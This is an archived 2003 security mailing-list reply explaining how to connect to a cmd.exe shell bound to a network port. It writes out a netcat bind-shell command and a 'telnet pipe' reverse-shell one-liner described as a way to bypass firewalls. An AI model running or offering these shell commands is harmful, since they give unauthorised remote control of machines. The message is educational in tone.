Re: How does one connect to a shell (cmd.exe) bound to a port on a remote machine?

From: DownBload (downbload_at_hotmail.com)
Date: 11/08/03

  • Next message: Golden_Eternity: "RE: How does one connect to a shell (cmd.exe) bound to a port on a remote machine?"
    Date: 8 Nov 2003 10:20:41 -0000
    To: security-basics@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) In-Reply-To: <20031106153902.26988032.mspencer@evidentdata.com>

    >From: "Mark G. Spencer" <mspencer@evidentdata.com>
    >I've been looking at some perl scripts that purport to create cmd.exe shells bound to a tcp port on a remote machine. I'm curious, how would someone connect to these shells? The code looks very compact, I wouldn't imagine you could just http to the port bound with cmd.exe? Perhaps telnet? Is this how Code Red and Nimda were operating?

    The best tool for such things is NetCat.
    Just run it as 'nc.exe -l -v -p 31337 -e cmd.exe' and you will have shell on tcp port 31337. When you want to connect to that host and port, use again NetCat, but now as 'nc.exe remote_host.com 31337' and you have shell.

    In some cases (like with firewalled machines) you can use "telnet pipe" technique to bypass firewall.

    First run two instance of nc.exe on your machine, like this:
    nc.exe -l -v -p 31337
    nc.exe -l -v -p 31338
    (each in spearated window)

    Now on remote machine do something like "telnet your_host.com 31337 | cmd.exe | telnet your_host.com 31338"
    Write commands in first window on your machine, and output will be in second window.

    ------------------------------------
    DownBload / Illegal Instruction Labs
    Security Research & Education
    http://www.ii-labs.org
    e-mail:downbload[at]hotmail.com
      , ,
     /| |\
     \\.....// "Born under the lucky star magical,
      |.\ /.| but on this earth generally tragical."
       \\^//
        o_o
         `
    Check our wargame: http://www.ii-labs.org/wargame/

    ---------------------------------------------------------------------------
    Forum Systems PRESIDIO: PGP / XML GATEWAY APPLIANCE
    The Presidio integrates PGP data encryption and XML Web Services security to
    simplify the management and deployment of PGP and reduce overall PGP costs
    by up to 80%.
    FREE WHITEPAPER & 30 Day Trial -
    http://www.securityfocus.com/sponsor/ForumSystems_security-basics_031027
    ----------------------------------------------------------------------------


  • Next message: Golden_Eternity: "RE: How does one connect to a shell (cmd.exe) bound to a port on a remote machine?"

    Relevant Pages